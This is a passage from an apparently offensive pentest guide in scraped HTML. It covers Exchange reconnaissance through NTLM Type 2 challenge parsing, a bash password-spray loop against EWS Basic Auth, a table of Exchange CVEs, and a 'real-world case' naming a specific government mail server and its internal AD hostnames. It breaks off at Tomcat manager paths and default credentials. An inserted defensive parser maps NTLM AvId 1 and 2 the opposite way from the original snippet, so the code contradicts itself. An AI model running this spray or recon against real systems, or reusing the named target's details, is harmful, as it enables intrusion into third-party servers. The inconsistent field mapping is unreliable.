&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/ews/Exchange.asmx&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;NTLM &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;type1&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Step 2: Extract Type 2 (challenge) from WWW-Authenticate header&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ntlm_b64 &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;headers[&lt;span style="color:#a6d189"&gt;&amp;#39;WWW-Authenticate&amp;#39;&lt;/span&gt;]&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;split(&lt;span style="color:#a6d189"&gt;&amp;#39;NTLM &amp;#39;&lt;/span&gt;)[&lt;span style="color:#ef9f76"&gt;1&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ntlm_raw &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;b64decode(ntlm_b64)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Step 3: Parse Type 2 fields&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sig &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; ntlm_raw[&lt;span style="color:#ef9f76"&gt;8&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;12&lt;/span&gt;] &lt;span style="color:#737994;font-style:italic"&gt;# MessageType, must be \x02\x00\x00\x00 (Type 2); bytes 0-8 are the &amp;#34;NTLMSSP\0&amp;#34; signature&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Target Name (offset 12-20)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tgt_len &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;from_bytes(ntlm_raw[&lt;span style="color:#ef9f76"&gt;12&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;14&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#39;little&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tgt_off &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;from_bytes(ntlm_raw[&lt;span style="color:#ef9f76"&gt;16&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;20&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#39;little&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;target_name &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; ntlm_raw[tgt_off:tgt_off&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;tgt_len]&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode(&lt;span style="color:#a6d189"&gt;&amp;#39;utf-16-le&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;Target Name: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;target_name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;# NetBIOS domain name&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Challenge (offset 24-32)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;challenge &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; ntlm_raw[&lt;span style="color:#ef9f76"&gt;24&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;32&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;NTLM Challenge: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;challenge&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;hex()&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;# Server challenge; only crackable together with a captured Type 3 (client response)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Target Info (AV_PAIRS) — contains gold!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ti_len &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;from_bytes(ntlm_raw[&lt;span style="color:#ef9f76"&gt;40&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;42&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#39;little&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ti_off &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;from_bytes(ntlm_raw[&lt;span style="color:#ef9f76"&gt;44&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;48&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#39;little&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;target_info &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; ntlm_raw[ti_off:ti_off&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;ti_len]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;av_pairs &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {  &lt;span style="color:#737994;font-style:italic"&gt;# AvId values per MS-NLMP 2.2.2.1 (1 is the computer, 2 the domain)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ef9f76"&gt;1&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;NetBIOS Computer&amp;#34;&lt;/span&gt;,  &lt;span style="color:#737994;font-style:italic"&gt;# MsvAvNbComputerName&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ef9f76"&gt;2&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;NetBIOS Domain&amp;#34;&lt;/span&gt;,  &lt;span style="color:#737994;font-style:italic"&gt;# MsvAvNbDomainName&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;DNS Computer&amp;#34;&lt;/span&gt;,  &lt;span style="color:#737994;font-style:italic"&gt;# MsvAvDnsComputerName (FQDN of the Exchange server)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ef9f76"&gt;4&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;DNS Domain&amp;#34;&lt;/span&gt;,  &lt;span style="color:#737994;font-style:italic"&gt;# MsvAvDnsDomainName (AD domain)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ef9f76"&gt;5&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;DNS Tree&amp;#34;&lt;/span&gt;,  &lt;span style="color:#737994;font-style:italic"&gt;# MsvAvDnsTreeName (forest root)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ef9f76"&gt;7&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;Timestamp&amp;#34;&lt;/span&gt;  &lt;span style="color:#737994;font-style:italic"&gt;# MsvAvTimestamp (8-byte FILETIME, not UTF-16)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pos &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; pos &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;4&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(target_info):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; av_id &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;from_bytes(target_info[pos:pos&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;2&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#39;little&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; av_len &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;from_bytes(target_info[pos&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;2&lt;/span&gt;:pos&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;4&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#39;little&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; av_id &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;0&lt;/span&gt;: &lt;span style="color:#ca9ee6"&gt;break&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# MsvAvEOL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; av_val &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; target_info[pos&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;4&lt;/span&gt;:pos&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;4&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;av_len]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; av_id &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; av_pairs:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; val &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; av_val&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode(&lt;span style="color:#a6d189"&gt;&amp;#39;utf-16-le&amp;#39;&lt;/span&gt;, errors&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;replace&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;av_pairs[av_id]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;val&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pos &lt;span style="color:#99d1db;font-weight:bold"&gt;+=&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;4&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; av_len
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;What each field reveals&lt;/strong&gt;:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;th&gt;Utility&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;NetBIOS Domain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;CNC&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Domain NetBIOS name&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NetBIOS Computer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ECBUE361&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Exchange server name&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DNS Domain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cnc.inter&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Complete internal AD domain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DNS Computer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ecbue361.cnc.inter&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Internal server FQDN&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NTLM Challenge&lt;/td&gt;
&lt;td&gt;&lt;code&gt;6178ba9de615e10e&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;For offline hash cracking&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
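&lt;p&gt;As an added example (not code from the original post), the same AV_PAIR walk written as a self-contained, bounds-checked parser that an asset owner can run against a captured Type 2 message to see exactly which internal names a server discloses to an unauthenticated client. It builds a constructed CHALLENGE_MESSAGE from sample values (the domain &lt;code&gt;corp.example.internal&lt;/code&gt;, host &lt;code&gt;MAIL01&lt;/code&gt; and timestamp are invented for the example), validates the signature, message type and TargetInfo offset/length before using them, stops on a truncated AV_PAIR instead of reading past the buffer, and decodes the MsvAvTimestamp FILETIME so the server clock is readable. It goes beyond the snippet above by handling malformed input and by reporting which fields differ from the public hostname.&lt;/p&gt;

```python
import datetime

# AvId values from the AV_PAIR structure (MS-NLMP 2.2.2.1)
AV_NAMES = {
    1: "NetBIOS Domain",
    2: "NetBIOS Computer",
    3: "DNS Domain",
    4: "DNS Computer",
    5: "DNS Tree",
    6: "Flags",
    7: "Timestamp",
}

# Constructed sample of what a domain-joined server typically puts in TargetInfo.
# These names are invented for the example; they are not taken from any real host.
SAMPLE_AV_PAIRS = [
    (1, "CORP".encode("utf-16-le")),
    (2, "MAIL01".encode("utf-16-le")),
    (3, "corp.example.internal".encode("utf-16-le")),
    (4, "mail01.corp.example.internal".encode("utf-16-le")),
    (7, (133485408000000000).to_bytes(8, "little")),  # FILETIME for 2024-01-01T00:00:00Z
]


def build_challenge(av_pairs, server_challenge=bytes(8)):
    """Assemble a CHALLENGE_MESSAGE (Type 2) around the given AV_PAIRs.

    Layout, all little-endian: 8-byte signature, 4-byte type, TargetName fields
    (len, maxlen, offset), 4-byte flags, 8-byte challenge, 8 reserved bytes,
    TargetInfo fields (len, maxlen, offset), then the payload at offset 48.
    """
    target_info = b""
    for av_id, value in av_pairs:
        target_info += av_id.to_bytes(2, "little") + len(value).to_bytes(2, "little") + value
    target_info += bytes(4)                                   # MsvAvEOL (AvId 0, AvLen 0)
    payload_offset = 48
    msg = b"NTLMSSP\x00"
    msg += (2).to_bytes(4, "little")
    msg += bytes(4) + payload_offset.to_bytes(4, "little")    # empty TargetName
    msg += (0x00028237).to_bytes(4, "little")                 # NegotiateFlags (typical value)
    msg += server_challenge
    msg += bytes(8)                                           # Reserved
    ti_len = len(target_info).to_bytes(2, "little")
    msg += ti_len + ti_len + payload_offset.to_bytes(4, "little")
    return msg + target_info


def filetime_to_iso(ft):
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to ISO 8601."""
    epoch = datetime.datetime(1601, 1, 1, tzinfo=datetime.timezone.utc)
    return (epoch + datetime.timedelta(microseconds=ft // 10)).isoformat()


def parse_challenge(msg):
    """Decode the fields a server discloses in its Type 2 message.

    Returns None when the buffer is not a well-formed CHALLENGE_MESSAGE. Every
    length/offset is checked against the buffer before use, and a malformed
    AV_PAIR ends the walk instead of reading past the end.
    """
    if 48 > len(msg) or msg[0:8] != b"NTLMSSP\x00":
        return None
    if int.from_bytes(msg[8:12], "little") != 2:
        return None
    flags = int.from_bytes(msg[20:24], "little")
    server_challenge = msg[24:32].hex()
    ti_len = int.from_bytes(msg[40:42], "little")
    ti_off = int.from_bytes(msg[44:48], "little")
    if ti_off + ti_len > len(msg):
        return None
    target_info = msg[ti_off:ti_off + ti_len]

    fields = {}
    pos = 0
    while len(target_info) - pos >= 4:
        av_id = int.from_bytes(target_info[pos:pos + 2], "little")
        av_len = int.from_bytes(target_info[pos + 2:pos + 4], "little")
        if av_id == 0:
            break                                   # MsvAvEOL
        if pos + 4 + av_len > len(target_info):
            break                                   # truncated pair: do not over-read
        av_val = target_info[pos + 4:pos + 4 + av_len]
        if av_id == 7 and av_len == 8:
            fields["Timestamp"] = filetime_to_iso(int.from_bytes(av_val, "little"))
        elif av_id == 6 and av_len == 4:
            fields["Flags"] = int.from_bytes(av_val, "little")
        elif av_id in (1, 2, 3, 4, 5):
            fields[AV_NAMES[av_id]] = av_val.decode("utf-16-le", errors="replace")
        pos += 4 + av_len
    return {"flags": flags, "challenge": server_challenge, "target_info": fields}


def internal_names_disclosed(parsed, public_host):
    """TargetInfo names that differ from the public hostname: what an
    unauthenticated client learns about the internal AD environment."""
    names = []
    for key in ("NetBIOS Domain", "NetBIOS Computer", "DNS Domain", "DNS Computer", "DNS Tree"):
        value = parsed["target_info"].get(key)
        if value and value.lower() != public_host.lower():
            names.append((key, value))
    return names


if __name__ == "__main__":
    sample = build_challenge(SAMPLE_AV_PAIRS, bytes.fromhex("0011223344556677"))
    result = parse_challenge(sample)
    for key, value in result["target_info"].items():
        print(f"{key}: {value}")
    print("disclosed:", internal_names_disclosed(result, "mail.example.com"))
```

The walk returns a dict rather than printing so it can feed a report or a test; on a real server the same function can be pointed at the base64 payload of a WWW-Authenticate: NTLM response to confirm, after a hardening change, that the internal DNS and NetBIOS names are no longer returned.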
&lt;h4 id="password-spray-via-basic-auth" &gt;
&lt;div&gt;
&lt;a href="#password-spray-via-basic-auth"&gt;
###
&lt;/a&gt;
Password Spray via Basic Auth
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;Exchange with Basic realm active allows password spray WITHOUT needing NTLM:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test credentials via EWS Basic Auth&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; email in admin@target.com user@target.com; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; pw in Senha2024 Senha2025; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;code&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;curl -sk -u &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$email&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$pw&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/ews/Exchange.asmx&amp;#34;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$code&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;200&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;✅ &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$email&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$pw&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="exchange-cves-by-version" &gt;
&lt;div&gt;
&lt;a href="#exchange-cves-by-version"&gt;
###
&lt;/a&gt;
Exchange CVEs by Version
&lt;/div&gt;
&lt;/h4&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;Build&lt;/th&gt;
&lt;th&gt;Critical CVEs&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Exchange 2016 CU23&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;15.1.2507.x&lt;/td&gt;
&lt;td&gt;CVE-2024-21410 (NTLM relay), CVE-2023-32031 (RCE), CVE-2022-41040/41082 (ProxyNotShell)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Exchange 2019 CU14&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;15.2.1258.x&lt;/td&gt;
&lt;td&gt;CVE-2024-26198, CVE-2023-21529 (RCE), CVE-2023-21763 (auth bypass)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Exchange 2013&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;15.0.x&lt;/td&gt;
&lt;td&gt;ProxyLogon (CVE-2021-26855+) — pre-auth RCE&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: &lt;code&gt;mail.enacom.gob.ar&lt;/code&gt; — Exchange 2016 (15.1.2507.61) with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;NTLM Negotiate active on EWS, OAB, API&lt;/li&gt;
&lt;li&gt;Basic realm exposed (&amp;ldquo;mail.enacom.gob.ar&amp;rdquo;)&lt;/li&gt;
&lt;li&gt;Healthcheck revealed internal hostname: &lt;code&gt;ECBUE361.CNC.INTER&lt;/code&gt; (AD domain: &lt;code&gt;CNC.INTER&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;OAuth and WS-Security enabled (headers: &lt;code&gt;X-OAuth-Enabled: True&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="85-tomcat" &gt;
&lt;div&gt;
&lt;a href="#85-tomcat"&gt;
##
&lt;/a&gt;
8.5 Tomcat
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Manager apps (deploy WAR = RCE)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/manager/html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/host-manager/html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Default credentials&lt;/span&gt;
